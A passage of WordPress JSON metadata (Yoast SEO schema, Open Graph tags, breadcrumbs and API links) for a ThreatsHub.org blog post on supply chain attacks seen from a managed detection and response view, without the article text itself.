Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\
\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","og_locale":"en_US","og_type":"article","og_title":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-08-04T00:00:00+00:00","og_image":[{"width":1428,"height":446,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","type":"image\/jpeg"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. 
reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst","datePublished":"2021-08-04T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/"},"wordCount":1639,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Malware","Trend Micro Research : Ransomware","Trend Micro Research : 
Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","url":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","name":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","datePublished":"2021-08-04T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg","width":1428,"height":446},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats 
Analyst"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a867
1ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/42142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=42142"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/42142\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/42143"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=42142"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=42142"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=42142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}